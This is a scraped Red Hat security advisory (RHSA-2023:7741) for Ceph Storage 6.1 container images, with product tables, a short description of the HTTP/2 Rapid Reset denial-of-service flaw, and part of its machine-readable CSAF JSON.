| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Workaround
|
Threats
Impact
Moderate
A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as 'Important' as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit. CVE-2023-39325 was assigned for the `Rapid Reset Attack` in the Go language packages.
7.5 (High)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Workaround
|
Threats
Impact
Important
A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as 'Important' as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit. CVE-2023-39325 was assigned for the Rapid Reset Attack in the Go language packages. Security Bulletin https://access.redhat.com/security/vulnerabilities/RHSB-2023-003
7.5 (High)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Workaround
|
Threats
Exploit Status
CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Impact
Important
References
49 references
Acknowledgments
Grafana Security Team
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.\n\nThis updated container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux.\n\nSpace precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index\n\nAll users of Red Hat Ceph Storage are advised to pull these new images from the Red Hat Ecosystem catalog.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:7741",
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2181117",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2181117"
},
{
"category": "external",
"summary": "2186322",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186322"
},
{
"category": "external",
"summary": "2210840",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840"
},
{
"category": "external",
"summary": "2210848",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848"
},
{
"category": "external",
"summary": "2242803",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803"
},
{
"category": "external",
"summary": "2243296",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243296"
},
{
"category": "external",
"summary": "2254041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254041"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_7741.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update",
"tracking": {
"current_release_date": "2026-05-30T20:35:44+00:00",
"generator": {
"date": "2026-05-30T20:35:44+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2023:7741",
"initial_release_date": "2023-12-12T13:55:37+00:00",
"revision_history": [
{
"date": "2023-12-12T13:55:37+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-12-12T13:55:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-30T20:35:44+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ceph Storage 6.1 Tools",
"product": {
"name": "Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ceph_storage:6.1::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ceph Storage"
},
{
"branches": [
{
"category": "product_version",
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"product": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82"
}
}
},
{
"category": "product_version",
"name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"product": {
"name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"product_id": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"product": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"product_id": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"product": {
"name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"product_id": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"product": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"product_id": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5"
}
}
},
{
"category": "product_version",
"name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"product": {
"name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"product_id": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"product": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82"
}
}
},
{
"category": "product_version",
"name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"product": {
"name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"product_id": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"product": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"product_id": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"product": {
"name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"product_id": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"product": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"product_id": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5"
}
}
},
{
"category": "product_version",
"name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64",
"product": {
"name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64",
"product_id": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"product": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82"
}
}
},
{
"category": "product_version",
"name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"product": {
"name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"product_id": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"product": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"product_id": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"product": {
"name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"product_id": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263"
}
}
},
{
"category": "product_version",
"name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"product": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"product_id": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5"
}
}
},
{
"category": "product_version",
"name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"product": {
"name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"product_id": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64"
},
